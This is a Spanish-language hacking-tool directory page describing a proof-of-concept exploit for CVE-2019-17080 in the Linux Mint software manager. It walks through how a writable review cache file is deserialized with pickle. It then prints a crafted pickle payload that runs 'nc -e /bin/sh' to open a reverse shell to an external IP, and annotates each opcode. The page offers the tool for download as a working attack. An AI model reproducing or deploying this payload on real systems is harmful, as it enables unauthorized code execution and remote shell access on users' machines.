Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Mintinstall-object-injection — CVE-2019-17080 | Kitploit
Herramientas/GitHubGitHub/andhrimnirr/mintinstall-object-injection
Generación de PayloadsAnálisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebMala Configuración
GitHubandhrimnirr/mintinstall-object-injection

Mintinstall-object-injection

CVE-2019-17080

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 6 añosAún no revisado

[TR] El administrador de software de Linux Mint (v 7.9.5/9) provoca la ejecución de inyección de objetos y código arbitrario debido a una configuración incorrecta.

[EN] El administrador de software de Linux Mint (v 7.9.5/9) nos hace ejecutar inyección de objetos y código arbitrario debido a una configuración incorrecta.

root@kitploit:~
mintinsall

[TR] Cuando ejecutamos el administrador de software de Mint, verifica si hay un nuevo comentario. Si hay un nuevo comentario, lo descarga de new-reviews.list y lo escribe en el archivo.

[EN] Si hay un nuevo comentario, lo descarga de new-reviews.list y lo escribe en el archivo.

root@kitploit:~
code mintinstall.py

[TR] Cuando el administrador de software se inicia por primera vez, llama a la clase ReviewCache() del módulo de revisiones.

[EN] Cuando el administrador de software se inicia por primera vez, llama a la clase ReviewCache() del módulo de revisiones.

¿Cómo Procesa los Datos?

¿Cómo Procesa los Datos?

root@kitploit:~
code reviews.py

[TR] Cuando la clase ReviewCache se inicia (init), llama a la función _load_cache().

[EN] Cuando la clase ReviewCache se inicia (init), llama a _load_cache()

[TR] La función Load cache lee el archivo en la variable REVIEWS_CACHE y deserializa los datos en el archivo con la ayuda del módulo pickle y almacena algunos valores en la memoria.

[EN] La función Load cache lee el archivo en la variable REVIEWS_CACHE y deserializa los datos en el archivo con la ayuda del módulo pickle y mantiene algunos valores en la memoria.

[TR] Cuando verifico el archivo, parece que tengo permiso de escritura.

[EN] Cuando verifico el archivo, parece que tengo permiso de escritura.

[TR] Ya que podemos realizar operaciones de serialización/deserialización con la ayuda del módulo Pickle, podemos incluir el módulo usando el método reduce y ejecutar código arbitrario.

[EN] Ya que podemos realizar operaciones de serialización/deserialización con el módulo Pickle, podemos incluir el módulo y ejecutar código arbitrario usando el método reduce.

[TR] En este caso, si se intenta deserializar el archivo, nuestro código malicioso se ejecutará.

[EN] Si intenta deserializar el archivo, nuestro código malicioso funcionará.

root@kitploit:~
cos 
system 
(S'nc -e /bin/sh 192.168.2.138 4545' 
tR.
>> nombre del módulo c{os}
>> función
( >> objeto marcador 
S >> lee hasta el final de la comilla y lo coloca en la pila
tR. >> llama a los elementos en la pila y coloca el resultado en la pila.

alt-text

Descargar herramienta